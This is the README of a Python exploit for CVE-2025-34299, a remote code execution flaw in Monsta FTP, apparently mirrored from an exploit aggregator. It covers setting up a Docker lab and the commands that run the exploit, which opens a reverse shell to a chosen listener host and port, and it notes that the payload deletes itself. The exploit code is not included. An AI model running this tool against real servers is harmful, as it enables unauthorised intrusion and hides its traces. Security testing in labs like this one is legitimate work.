## https://sploitus.com/exploit?id=540E435E-D5DC-52EA-9D59-604127ADE416
# Monsta FTP CVE-2025-34299 Exploit
Python exploit for the RCE vulnerability in Monsta FTP (CVE-2025-34299).
## Description
This vulnerability allows arbitrary PHP code execution on the Monsta FTP server by exploiting the `downloadFile` functionality which allows downloading files from a malicious FTP or SFTP server. The exploit establishes a reverse shell connection using pwntools.
**Note:** While the [watchTowr Labs research](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) demonstrates the vulnerability using SFTP, this exploit uses FTP which also works perfectly fine.
## Prerequisites
- Python 3.x
- Docker and Docker Compose (optional)
- Network access to download Monsta FTP from archive.org
## Installation
Install Python dependencies:
```bash
pip install -r requirements.txt
```
## Usage
### Setting up the lab
The Dockerfile automatically downloads and installs Monsta FTP 2.10.4 from archive.org during the build process.
**Build and start the lab:**
```bash
cd lab
docker build -t monsta-ftp:2.10.4 .
docker run -d --name monsta-ftp-test -p 8080:80 monsta-ftp:2.10.4
```
**Alternative with Docker Compose:**
```bash
cd lab
docker-compose up -d
```
The lab will be available at `http://127.0.0.1:8080/mftp`
**Verify the installation:**
```bash
curl http://127.0.0.1:8080/mftp/
```
You should see the Monsta FTP login page.
**Container management:**
- Stop the container: `docker stop monsta-ftp-test`
- Start the container: `docker start monsta-ftp-test`
- View logs: `docker logs monsta-ftp-test`
- Stop and remove the container: `docker rm -f monsta-ftp-test`
- Rebuild the image: `docker build -t monsta-ftp:2.10.4 .`
### Running the exploit
Once the lab is running, execute the exploit:
```bash
python3 exploit.py http://127.0.0.1:8080/mftp
```
**Options:**
- `--host`: FTP server host (default: 172.17.0.1)
- `--port`: FTP server port (default: 2121)
- `--lhost`: Listener host for reverse shell (default: 172.17.0.1)
- `--lport`: Listener port for reverse shell (default: 4444)
**Example with custom listener:**
```bash
python3 exploit.py http://127.0.0.1:8080/mftp \
--lhost 172.17.0.1 \
--lport 4444
```
**How it works:**
1. Starts a malicious FTP server with a reverse shell payload
2. Uploads the payload to Monsta FTP via the vulnerable `downloadFile` endpoint
3. Triggers the payload execution
4. Establishes an interactive reverse shell using pwntools
The payload automatically deletes itself after execution.
## References
- [CVE-2025-34299](https://vulners.com/cve/CVE-2025-34299)
- [watchTowr Labs - Monsta FTP Remote Code Execution CVE-2025-34299](https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/) (Note: The research demonstrates SFTP, but FTP works as well)